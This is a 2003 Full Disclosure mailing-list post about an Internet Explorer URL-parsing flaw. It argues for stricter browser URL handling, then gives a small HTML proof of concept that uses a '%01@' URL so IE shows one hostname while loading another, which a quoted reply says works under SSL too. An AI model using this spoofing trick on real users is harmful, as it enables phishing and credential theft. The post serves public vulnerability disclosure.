Full Disclosure mailing list archives

Re: Re: Internet Explorer URL parsing vulnerability


From: "Erik van Straten" <emvs.fd.3FB4D11C () cpo tn tudelft nl>
Date: Fri, 12 Dec 2003 13:49:06 +0100

Hi all,

On Wed, 10 Dec 2003 13:01:42 -0500 Valdis Kletnieks wrote:
> Most reasonable software will put in an outline-box or "\NNN", or
> other similar indication a glyph is not displayable in the charset
> in use, and then *continue trying* to render the rest of the
> string.

I disagree that software should attempt to continue parsing URLs
(and *ML code for that matter) after an error or if something
unexpected happens. This is asking for lots of new vulns. Instead,
everything should come to a halt and a "page" or error box should
say "Bad URL syntax".

An IE warning box for "legitimate" use of @ in URLs would be great.

In case of SSL, the lock icon should *immediately* disappear, and
an (optional) warning box should pop up, if the hostname in the cert
no longer matches *either* the one displayed in the URL combobox
*or* the actual underlying connection. Also, it is probably a good
idea to have the page turn blank (or show a red cross) as soon as
the displayed URL doesn't match the connection (for example if
someone starts to manually edit the URL, but eventually does not
press enter).

Now for the fun part.

Some people have rightfully expressed their concerns about whether
https://www.betaplace.com actually is a Microsoft site (it is).

To confirm, visit https://www.betaplace.microsoft.com ; it works,
however currently the certificate is invalid (hostname mismatch).

Here's my tip for Microsoft (acks to Petard :)
Save the following to a file whatever.htm, and open that in MSIE:

-------------- start cut here -------------
<HTML><BODY>
<!-- The visible href carries the microsoft.com hostname; the onclick
     handler instead navigates to the %01@ URL, which IE displays as
     www.betaplace.microsoft.com but connects to www.betaplace.com -->
<a href="https://www.betaplace.microsoft.com"
onclick="location.href=unescape(

'https://www.betaplace.microsoft.com%01@www.betaplace.com/betaplace/sign-in/betaplace.asp'

); return false;">
Visit the *REAL* Microsoft's BetaPlace site</a>
</BODY></HTML>
-------------- end cut here -------------

Note: if the line with '@' in the middle wraps, unwrap it before
saving to the htm file. There shouldn't be any spaces in it. The
blank lines in between are okay.

Cheers,
Erik

On Thu, 11 Dec 2003 19:20:14 +0000 Petard wrote:
> It gets better... it works with SSL sites as well. The little lock, and
> no warning message:
> http://petard.freeshell.org/hotmail-pr.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

